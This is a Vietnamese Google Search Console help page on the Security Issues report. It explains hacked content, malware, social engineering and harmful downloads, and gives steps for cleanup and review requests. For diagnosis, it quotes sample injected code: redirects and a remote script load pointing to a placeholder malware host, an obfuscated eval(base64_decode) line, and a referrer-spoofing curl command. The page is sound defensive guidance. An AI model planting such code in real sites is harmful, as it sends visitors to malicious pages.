Nếu kết quả đánh giá của Google cho thấy trang web của bạn đã bị tấn công hoặc có hành vi có thể gây hại cho khách truy cập hoặc máy tính của họ, thì báo cáo Vấn đề bảo mật sẽ trình bày các kết quả này. Một số hành vi gây hại có thể kể đến như tấn công lừa đảo hay cài đặt phần mềm độc hại hoặc phần mềm không mong muốn vào máy tính của người dùng.
Nếu bị ảnh hưởng do một vấn đề bảo mật, trang hoặc trang web có thể xuất hiện kèm theo nhãn cảnh báo trong kết quả tìm kiếm, hoặc trình duyệt có thể hiển thị một trang cảnh báo trung gian khi người dùng cố gắng truy cập những trang này.
Security issues report in Search Console - Google Search Console Training
Vấn đề bảo mật là gì?
Những vấn đề bảo mật được báo cáo ở đây thuộc các loại sau:
- Nội dung bị tấn công: Đây là bất kỳ nội dung nào được đặt lên trang web mà không có sự cho phép của bạn do các lỗ hổng bảo mật trên trang web. Để bảo vệ người dùng, Google cố gắng hết sức để xóa nội dung bị tấn công khỏi kết quả tìm kiếm. Tìm hiểu thêm.
- Phần mềm độc hại và phần mềm không mong muốn: Đây là loại phần mềm được thiết kế để gây hại cho thiết bị hoặc người dùng thiết bị, có hành vi lừa đảo hoặc không mong muốn, hoặc có ảnh hưởng tiêu cực đến người dùng. Phần mềm độc hại có thể do tin tặc hoặc chủ sở hữu trang web cài đặt. Tìm hiểu thêm.
- Tấn công phi kỹ thuật: Đây là nội dung lừa khách truy cập thực hiện một hành động nguy hiểm nào đó, chẳng hạn như cung cấp thông tin mật hoặc tải phần mềm xuống. Tìm hiểu thêm.
Trang web của tôi có vấn đề bảo mật nào không?
Nếu có vấn đề bảo mật trên trang web của bạn, bạn sẽ thấy tổng số vấn đề bảo mật trên trang web ở đầu bảng báo cáo.
Nếu trang web của bạn không có vấn đề bảo mật, bạn sẽ thấy dấu kiểm màu xanh lá cây và thông báo tương ứng.
Nhưng tôi vừa mới mua trang web này mà!
Nếu gần đây bạn mua một trang web từng có vấn đề bảo mật, hãy khắc phục các vấn đề trong báo cáo Vấn đề bảo mật rồi gửi yêu cầu xem xét lại. Yêu cầu này nhằm thông báo rằng bạn vừa mới mua trang web và hiện trang web này đã tuân thủ Chính sách về mánh khóe tăng thứ hạng đối với Google Tìm kiếm cho web.
Tôi không thể tái hiện vấn đề đó
Tính năng Duyệt web an toàn của Google hiển thị cảnh báo cho người dùng dựa trên ngữ cảnh duyệt web. Do đó, đôi khi có thể bạn không tái hiện được các cảnh báo này. Tuy nhiên, bạn nên coi báo cáo Vấn đề bảo mật là một nguồn đáng tin cậy nhằm xác minh xem có vấn đề bảo mật nào trên trang web của bạn hay không, hoặc những vấn đề đó đã được khắc phục hay chưa.
Những trang nào bị ảnh hưởng?
Hãy mở rộng phần mô tả vấn đề để xem danh sách ví dụ về các URL bị ảnh hưởng. Danh sách này có thể không đầy đủ mà chỉ đưa ra ví dụ về một số trang trên trang web chịu ảnh hưởng của vấn đề bạn chọn. Đôi khi, bạn có thể gặp một vấn đề bảo mật nhưng không có URL ví dụ trong báo cáo. Điều này không có nghĩa là không có trang nào bị ảnh hưởng, mà là do chúng tôi không thể tạo ví dụ vì lý do nào đó.
Phần chi tiết vấn đề cho thấy ngày đầu tiên chúng tôi phát hiện thấy vấn đề này trên trang web của bạn, cũng như nội dung mô tả ngắn gọn và đường liên kết để tìm hiểu thêm về vấn đề.
Khắc phục vấn đề
Để khắc phục vấn đề bảo mật trên trang web của bạn, hãy làm theo các bước sau:
- Mở rộng phần mô tả vấn đề trên báo cáo Vấn đề bảo mật.
- Đọc nội dung mô tả về vấn đề và truy cập đường liên kết "Tìm hiểu thêm" để xem thông tin chi tiết và các bước khắc phục vấn đề đó. (Khi nhấp vào đường liên kết để tìm hiểu thêm, bạn sẽ được chuyển đến các phần mô tả bên dưới trên trang này.)
- Hãy dùng ví dụ mẫu về các trang bị ảnh hưởng được cung cấp trong phần chi tiết để khắc phục vấn đề. Danh sách này có thể không đầy đủ mà chỉ mà chỉ nêu ví dụ về một số trang trên trang web chịu ảnh hưởng bởi vấn đề này. Bạn có thể gặp một vấn đề bảo mật nhưng không có URL ví dụ trong báo cáo. Điều này không có nghĩa là không có trang nào bị ảnh hưởng mà là do chúng tôi không thể tạo ví dụ vì lý do nào đó.
- Khắc phục vấn đề trong toàn bộ trang web của bạn. Việc chỉ khắc phục vấn đề trên một số trang sẽ không giúp các trang này xuất hiện lại trong kết quả tìm kiếm.
- Nếu báo cáo liệt kê nhiều vấn đề bảo mật ảnh hưởng đến trang web của bạn, hãy khắc phục tất cả các vấn đề đó.
- Kiểm tra kết quả khắc phục.
- Khi bạn đã khắc phục tất cả các vấn đề trong báo cáo trên tất cả các trang, hãy chọn Yêu cầu xem xét lại trong bảng báo cáo về các vấn đề bảo mật. Mô tả cách khắc phục của bạn trong yêu cầu xem xét lại. Một yêu cầu xem xét lại thích hợp bao gồm ba nội dung:
- Giải thích chính xác vấn đề chất lượng trên trang web của bạn.
- Mô tả các bước bạn đã thực hiện để khắc phục vấn đề.
- Ghi lại kết quả của những lần bạn cố gắng khắc phục vấn đề đó.
- Quá trình xem xét lại có thể mất một chút thời gian (xem bên dưới). Bạn sẽ được thông báo về tiến độ qua email. Sau khi gửi yêu cầu, bạn sẽ nhận được thông báo xác nhận việc xem xét lại để bạn biết rằng chúng tôi đang tiến hành xem xét. Không gửi lại yêu cầu trước khi bạn nhận được quyết định cuối cùng về yêu cầu đang chờ xử lý của mình.
Quá trình xem xét lại sẽ mất bao lâu?
Phần lớn các trường hợp xem xét lại sẽ mất vài ngày hoặc vài tuần. Tuy nhiên, trong một số trường hợp (chẳng hạn như yêu cầu xem xét lại liên quan đến đường liên kết), chúng tôi có thể mất nhiều thời gian hơn bình thường để xem xét yêu cầu của bạn. Khi nhận được yêu cầu của bạn, chúng tôi sẽ thông báo qua email để bạn biết rằng chúng tôi đang xử lý yêu cầu đó. Bạn cũng sẽ nhận được email khi quá trình xem xét lại hoàn tất.
Vui lòng không gửi lại yêu cầu trước khi bạn nhận được quyết định về bất kỳ yêu cầu đang xử lý nào. Nếu bạn gửi yêu cầu xem xét lại khi chưa khắc phục vấn đề, thì thời gian xử lý yêu cầu tiếp theo của bạn có thể lâu hơn hoặc thậm chí bạn có thể bị đánh dấu là người vi phạm nhiều lần.
Danh sách các vấn đề bảo mật
Dưới đây là danh sách các vấn đề bảo mật có thể xảy ra và thông tin về cách khắc phục từng vấn đề. Các vấn đề này được phân loại là lỗi hoặc cảnh báo .
Giải thích vấn đề bảo mật – Chương trình đào tạo về Google Search Console
1. Xác nhận vấn đề
Hãy truy cập vào một số URL ví dụ trong trình duyệt Chrome. Bạn có thể sẽ thấy cảnh báo Nguy hiểm trong thanh điều hướng của trình duyệt, cũng như một trang xen kẽ có nội dung cảnh báo tương tự như sau:
2. Xác định xem bạn có thể tự khắc phục vấn đề không
Để khắc phục vấn đề về phần mềm độc hại trên trang web của mình, bạn cần có kỹ năng đọc và hiểu đoạn mã, thậm chí là cả cấu hình máy chủ web cho trang web của mình. Nếu bạn nghĩ rằng điều này nằm ngoài khả năng của mình, hãy đọc phần Xây dựng nhóm hỗ trợ để tìm hiểu cách nhờ người khác giúp bạn khắc phục vấn đề này.
3. Chẩn đoán và khắc phục vấn đề về phần mềm độc hại
Hãy đọc phần về cách khắc phục khi bị tấn công bằng phần mềm độc hại trong hướng dẫn về trường hợp bị tấn công trên web.dev để tìm hiểu cách xác định loại phần mềm độc hại và khắc phục vấn đề. Xin lưu ý rằng trang web của bạn có thể bị nhiễm nhiều loại phần mềm độc hại, vì thế, hãy chẩn đoán và dọn dẹp kỹ trang web. Hãy xác nhận rằng vấn đề đó có mặt trên một trong các URL ví dụ có trong báo cáo Vấn đề bảo mật.
4. Yêu cầu xem xét
Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
5. Làm theo các phương pháp hay nhất để giữ an toàn cho trang web
Đọc những nguyên tắc về cách ngăn tin tặc tấn công trang web và cách theo dõi sự an toàn của trang web.
Một tin tặc đã xâm nhập trang web của bạn và đang chèn mã độc vào các trang của bạn. Ví dụ: chuyển hướng đến một trang web có hại hoặc chạy phần mềm khai thác tiền điện tử trên trình duyệt của bạn trong khi trang đang mở.
1. Xác định xem bạn có thể tự khắc phục vấn đề không
Xem nội dung Xây dựng nhóm hỗ trợ để biết bạn cần những gì để tự khắc phục vấn đề này, hoặc cách yêu cầu hỗ trợ nếu bạn cho rằng việc này nằm ngoài khả năng của mình.
2. Xác nhận vấn đề
Hãy xác nhận rằng vấn đề đó có mặt trên một trong các URL ví dụ được nêu cho cảnh báo này.
Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.
Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.
Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:
- Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
- Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến
www.example.com/page.html
trên máy Windows, bạn sẽ sử dụng cURL như sau:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
Tin tặc có thể đã chèn mã độc trực tiếp vào các tệp HTML trên trang web của bạn (ví dụ: thêm lệnh chuyển hướng JavaScript) hoặc vào các tệp tạo nội dung trang web (ví dụ: tệp PHP).
Hãy tìm nạp một trang bị xâm nhập có trong báo cáo và kiểm tra phản hồi. Tin tặc có thể sử dụng một số mánh khóe khác nhau để chuyển hướng khách truy cập từ trang web của bạn đến trang của họ. Sau đây là một số ví dụ:
- Chuyển hướng:
- Chuyển hướng bằng tiêu đề: Tin tặc có thể chuyển hướng khách truy cập bằng cách sửa đổi (các) tệp cấu hình trên máy chủ của bạn. Tệp cấu hình máy chủ thường cho phép quản trị viên trang web xác định hành vi chuyển hướng URL cho các trang hoặc thư mục cụ thể trên một trang web. Ví dụ: trên máy chủ Apache, đây là tệp .htaccess và httpd.conf.
... < HTTP/1.1 301 Moved Permanently < Date: Sun, 24 Feb 2013 21:06:45 GMT < Server: Apache < Location: http://<malware-site>/index.html < Content-Length: 253
- Chuyển hướng bằng JavaScript:
<script> if (document.referrer.match(/google\.com/)) { window.location("http://<malware-site>/");} <script>
- Chuyển hướng bằng tiêu đề: Tin tặc có thể chuyển hướng khách truy cập bằng cách sửa đổi (các) tệp cấu hình trên máy chủ của bạn. Tệp cấu hình máy chủ thường cho phép quản trị viên trang web xác định hành vi chuyển hướng URL cho các trang hoặc thư mục cụ thể trên một trang web. Ví dụ: trên máy chủ Apache, đây là tệp .htaccess và httpd.conf.
- JavaScript độc hại được tải từ một trang web khác:
<script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
- Mã có hại bị xáo trộn để tránh bị phát hiện:
eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));
Tìm kiếm mã đáng ngờ trong phản hồi của bạn và trên trang web của bạn. Các cụm từ tìm kiếm hữu ích bao gồm "search", "eval", "base64_decode" và "unescape".
3. Dọn dẹp trang web của bạn
Khi đã sẵn sàng dọn dẹp trang web, bạn có thể thay thế các tệp bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc tự xóa nội dung vi phạm.
Ngoài ra:
- Hãy đọc hướng dẫn dành cho trang web bị tấn công để nắm được quy trình khắc phục hoàn chỉnh cho trang web, bao gồm cả các bước dọn dẹp và mẹo để ngăn không cho trang web của bạn bị tấn công lần nữa.
4. Yêu cầu xem xét
Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
Một tin tặc đã thêm các đường liên kết hoặc văn bản vi phạm vào các trang trên trang web của bạn. Nội dung được chèn có thể chứa các cụm từ chỉ dược phẩm hoặc nội dung vi phạm khác không liên quan đến nội dung của trang web.
Thông thường, tin tặc chỉnh sửa trang web của bạn theo một trong các cách sau:
- Bằng cách giành quyền truy cập vào một thư mục không an toàn trên máy chủ của bạn. Ví dụ: bạn có thể đã vô tình để một thư mục có quyền mở.
- Bằng cách khai thác một lỗ hổng trong phần mềm chạy trên trang web của bạn, chẳng hạn như một hệ thống quản lý nội dung. Ví dụ: bạn có thể đang chạy một phiên bản cũ hơn và kém an toàn của Drupal, Joomla! hoặc WordPress.
- Bằng cách tấn công các plugin bên chứ ba mà bạn sử dụng trên trang web của mình, chẳng hạn như bộ đếm khách truy cập.
1. Xác định xem bạn có thể tự khắc phục vấn đề không
Xem nội dung Xây dựng nhóm hỗ trợ để biết bạn cần những gì để tự khắc phục vấn đề này, hoặc cách yêu cầu hỗ trợ nếu bạn cho rằng việc này nằm ngoài khả năng của mình.
2. Xác nhận vấn đề
Hãy xác nhận rằng vấn đề đó có mặt trên một trong các URL ví dụ được nêu cho cảnh báo này.
Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.
Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.
Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:
- Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
- Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến
www.example.com/page.html
trên máy Windows, bạn sẽ sử dụng cURL như sau:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
Tìm nạp một số trang trên trang web của bạn và tìm trong phản hồi để xác định nội dung hay đường liên kết đáng ngờ mà không phải do bạn thêm vào. Ví dụ: tìm kiếm các cụm từ chỉ dược phẩm hoặc nội dung vi phạm như "viagra" hoặc "kiếm tiền".
3. Dọn dẹp trang web của bạn
Khi đã sẵn sàng dọn dẹp trang web, bạn có thể thay thế các tệp bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc xóa nội dung và đường liên kết không liên quan ra khỏi từng trang. Bạn nên khắc phục tất cả các ví dụ về trang bị tấn công được nêu ra trong báo cáo Vấn đề bảo mật. Ngoài ra, hãy tìm kiếm các trang khác trên trang web của bạn mà có thể đã bị tấn công bằng cách sử dụng lệnh tìm kiếm "site:" trên Google và tìm các tệp nguồn trên trang web của bạn.
Ngoài ra:
- Hãy đọc hướng dẫn dành cho trang web bị tấn công để nắm được quy trình khắc phục hoàn chỉnh cho trang web, bao gồm cả các bước dọn dẹp và mẹo để ngăn không cho trang web của bạn bị tấn công lần nữa.
4. Yêu cầu xem xét
Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
Một tin tặc đã tạo trang mới trên trang web của bạn và các trang này thường chứa các từ hoặc đường liên kết vi phạm. Đôi khi các trang mới này chứa mã mà sẽ thực hiện những điều bạn không có ý định làm, chẳng hạn như chuyển hướng người dùng của bạn đến các trang web khác hoặc làm cho máy chủ web của bạn tham gia hình thức tấn công từ chối dịch vụ vào các trang web khác.
1. Xác định xem bạn có thể tự khắc phục vấn đề không
Xem nội dung Xây dựng nhóm hỗ trợ để biết bạn cần những gì để tự khắc phục vấn đề này, hoặc cách yêu cầu hỗ trợ nếu bạn cho rằng việc này nằm ngoài khả năng của mình.
2. Xác nhận vấn đề
Hãy xác nhận rằng vấn đề đó có mặt trên một trong các URL ví dụ được nêu cho cảnh báo này.
Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.
Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.
Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:
- Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
- Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến
www.example.com/page.html
trên máy Windows, bạn sẽ sử dụng cURL như sau:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
Truy vấn các URL mẫu được liệt kê trong báo cáo để xem chúng có hoạt động không. Có thể các trang này không phải do bạn tạo, vì vậy bạn sẽ cần xóa các trang trên trang web của mình hoặc loại bỏ mã dùng để tự động tạo các trang đó. Đọc cách tìm và dọn dẹp các trang này khỏi trang web của bạn.
Bạn cũng có thể thực hiện phép tìm kiếm "site":" để tìm các trang mà bạn không tạo.
- Trên một trang web nhỏ, bạn có thể tìm kiếm [site: example.com] trên Google Tìm kiếm để xem danh sách các trang mà chúng tôi đã lập chỉ mục, để xem có trang nào mà bạn không tạo hay không.
- Đối với các trang web lớn hơn, bạn có thể sử dụng một truy vấn cụ thể hơn, ví dụ như:
- [site:example.com pharmacy] – Liệt kê tất cả các trang có chứa từ "pharmacy" trên example.com. Thay thế các từ không liên quan thường gặp khác.
- [site: example.com/wp-admin/] – Liệt kê tất cả các trang trong phần dành cho quản trị viên trên trang WordPress của bạn.
3. Dọn dẹp trang web của bạn
Khi đã sẵn sàng dọn dẹp trang web, bạn có thể thay thế các thư mục bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc xóa các trang không mong muốn và bất kỳ tệp hoặc chức năng nào mà tin tặc sử dụng để tạo các trang đó.
Ngoài ra:
- Hãy đọc hướng dẫn dành cho trang web bị tấn công để nắm được quy trình khắc phục hoàn chỉnh cho trang web, bao gồm cả các bước dọn dẹp và mẹo để ngăn không cho trang web của bạn bị tấn công lần nữa.
4. Yêu cầu xem xét
Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
Trang web của bạn có nội dung lừa người dùng thực hiện một hành động gì đó nguy hiểm, chẳng hạn như cung cấp thông tin mật hoặc tải phần mềm xuống. Công cụ Duyệt web An toàn của Google bảo vệ người dùng web bằng cách cảnh báo cho người dùng trước khi họ truy cập các trang thường xuyên hiển thị nội dung lừa đảo.
Các trang web bị coi là lừa đảo khi chúng:
- Giả vờ hành động hoặc trông có vẻ như một thực thể đáng tin cậy, như thiết bị hay trình duyệt của riêng bạn hoặc bản thân trang web hoặc
- Cố lừa bạn thực hiện hành động gì đó mà bạn chỉ làm cho một bên đáng tin cậy, như chia sẻ mật khẩu, gọi bộ phận hỗ trợ kỹ thuật hay tải phần mềm xuống.
Loại nội dung lừa đảo này được gọi là tấn công phi kỹ thuật. Tìm hiểu thêm về hành vi tấn công phi kỹ thuật hoặc xem các ví dụ về các trang lừa đảo.
Khắc phục vấn đề
1. Xác nhận vấn đề
Truy cập các trang ví dụ để tìm nội dung lừa đảo. Bạn có thể sử dụng Công cụ Kiểm tra URL để xem trang web của mình ở cả chế độ xem cho thiết bị di động và máy tính.
2. Khắc phục vấn đề trên các trang của bạn
Khắc phục vấn đề trên mọi trang có hành vi tấn công phi kỹ thuật. Nếu bạn tin rằng công cụ Duyệt web an toàn đã phân loại nhầm một trang, vui lòng báo cáo tại đây.
3. Yêu cầu xem xét
Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
Trang web của bạn có quảng cáo hoặc tài nguyên nhúng mang tính chất lừa đảo để lừa khách truy cập thực hiện một hành động gì đó nguy hiểm, chẳng hạn như cung cấp thông tin mật hoặc tải phần mềm không mong muốn xuống. Nội dung lừa đảo có thể được đưa vào thông qua tài nguyên nhúng trên trang, chẳng hạn như hình ảnh, các thành phần bên thứ ba khác hoặc quảng cáo. Công cụ Duyệt web An toàn của Google bảo vệ người dùng web bằng cách cảnh báo cho người dùng trước khi họ truy cập các trang thường xuyên hiển thị nội dung lừa đảo.
Đôi khi nội dung này hiển thị cho người dùng trên trang web lưu trữ. Trong các trường hợp khác, trang web lưu trữ không hiển thị bất kỳ quảng cáo nào, nhưng dẫn người dùng đến các trang lừa đảo thông qua cửa sổ bật mở, cửa sổ ẩn hay các loại chuyển hướng khác. Trong mọi trường hợp, loại nội dung nhúng này đều sẽ dẫn đến lỗi vi phạm chính sách trên trang lưu trữ.
Loại nội dung lừa đảo này được gọi là tấn công phi kỹ thuật. Tìm hiểu thêm về hành vi tấn công phi kỹ thuật hoặc xem các ví dụ về tài nguyên nhúng mang tính chất lừa đảo.
Khắc phục vấn đề
1. Xác nhận vấn đề
Truy cập các trang ví dụ để tìm nội dung lừa đảo. Xác minh rằng mọi quảng cáo, hình ảnh hay tài nguyên bên thứ ba được nhúng trên các trang thuộc trang web của bạn đều không phải là nội dung lừa đảo. Xin lưu ý rằng mạng quảng cáo có thể xoay vòng các quảng cáo hiển thị trên các trang thuộc trang web của bạn. Vì thế bạn có thể cần phải làm mới trang vài lần trước khi thấy được bất kỳ quảng cáo tấn công phi kỹ thuật nào xuất hiện. Một số quảng cáo có thể hiển thị theo cách khác nhau trên thiết bị di động và máy tính để bàn. Bạn có thể sử dụng Công cụ kiểm tra URL để xem trang web của mình ở cả chế độ xem cho thiết bị di động và máy tính.
2. Xóa các quảng cáo hoặc tài nguyên lừa đảo
Kiểm tra tài nguyên bên thứ ba có trong trang web của bạn. Đảm bảo rằng mọi quảng cáo, hình ảnh hay tài nguyên bên thứ ba được nhúng trên các trang thuộc trang web của bạn đều không phải là nội dung lừa đảo. Khắc phục vấn đề trên mọi trang có hành vi tấn công phi kỹ thuật.
3. Yêu cầu xem xét
Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
Trang web của bạn có tệp tải xuống mà tính năng Duyệt web An toàn của Google cho là phần mềm độc hại hoặc phần mềm không mong muốn. Trình duyệt Chrome có thể hiển thị cảnh báo khi người dùng truy cập trang web của bạn. Bạn phải xóa các tệp tải xuống này khỏi trang web của bạn để xóa cảnh báo.
1. Xác nhận vấn đề
Hãy xem một số trang ví dụ trên trang web của bạn để xem các tệp tải xuống này có tồn tại hay không.
2. Đánh giá vấn đề
- Nếu các tệp tải xuống này là có chủ đích, hãy xóa chúng khỏi trang web của bạn và chuyển đến bước Yêu cầu xem xét lại.
- Nếu không biết bất kỳ tệp tải xuống nào trên trang web của mình, thì bạn có thể đã bị tấn công. Bạn nên khắc phục trang web bị tấn công, rồi tìm và xóa tệp tải xuống.
3. Dọn dẹp trang web của bạn
Hãy đọc hướng dẫn dành cho trang web bị tấn công để nắm được quy trình khắc phục hoàn chỉnh cho trang web, bao gồm cả các bước dọn dẹp và mẹo để ngăn không cho trang web của bạn bị tấn công lần nữa. Khi đã sẵn sàng dọn dẹp trang web, bạn có thể thay thế các tệp bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc tự xóa nội dung vi phạm. Hãy sử dụng phần mềm diệt virus để quét các tệp nhị phân và nội dung khác được lưu trữ trên trang web của bạn. Phần mềm diệt virus có thể tìm thấy nhiều loại phần mềm có hại và phần mềm không mong muốn, nhưng rất tiếc là không phải tất cả. Việc gửi phần mềm của bạn cho một chương trình diệt virus (hoặc dịch vụ diệt virus tổng hợp, chẳng hạn như VirusTotal) sẽ cung cấp cho bạn chỉ báo về các vấn đề tiềm ẩn với phần mềm của bạn. Duyệt web An toàn của Google áp dụng tiêu chí riêng của mình để xác định xem một chương trình hay tệp nhị phân có phải là phần mềm không mong muốn hoặc phần mềm độc hại hay không.
4. Xác nhận kết quả khắc phục
Hãy đảm bảo rằng trang web của bạn tuân thủ Chính sách về phần mềm không mong muốn.
5. Yêu cầu xem xét
Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại về tính bảo mật trong báo cáo Vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
Trang web của bạn đang liên kết đến các trang web cung cấp các tệp tải xuống là phần mềm độc hại hoặc phần mềm không mong muốn, theo công cụ Duyệt web An toàn của Google. Trình duyệt Chrome có thể hiển thị cảnh báo khi người dùng truy cập trang web của bạn. Bạn phải xóa liên kết đến các trang web có hại để xóa cảnh báo này.
1. Xác nhận vấn đề
Hãy xem một số trang ví dụ trên trang web của bạn để xem các tệp tải xuống này có tồn tại hay không. Trong một số trường hợp, tin tặc có thể ẩn các đường liên kết này nếu cho rằng bạn là chủ sở hữu trang web, vì vậy hãy thử truy cập URL mẫu bằng Công cụ kiểm tra URL hoặc đăng nhập bằng tài khoản khác hoặc trên một máy tính khác.
2. Đánh giá vấn đề
Nếu các liên kết này là có chủ đích, hãy xóa chúng khỏi trang web của bạn và chuyển đến bước Yêu cầu xem xét lại.
Nếu không biết về các đường liên kết này thì bạn có thể đã bị tấn công.
3. Xác định xem bạn có thể tự khắc phục vấn đề không
Nếu bạn bị tấn công, hãy xem phần Xây dựng nhóm hỗ trợ để biết bạn cần những gì để tự khắc phục vấn đề này, hoặc cách yêu cầu hỗ trợ nếu bạn nghĩ rằng việc này nằm ngoài khả năng của bạn.
4. Dọn dẹp trang web của bạn
Hãy đọc hướng dẫn dành cho trang web bị tấn công để nắm được quy trình khắc phục hoàn chỉnh cho trang web, bao gồm cả các bước dọn dẹp và mẹo để ngăn không cho trang web của bạn bị tấn công lần nữa. Khi đã sẵn sàng dọn dẹp trang web, bạn có thể thay thế các tệp bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc tự xóa nội dung vi phạm.
5. Xác nhận kết quả khắc phục
Hãy đảm bảo rằng trang web của bạn tuân thủ Chính sách về phần mềm không mong muốn.
6. Yêu cầu xem xét
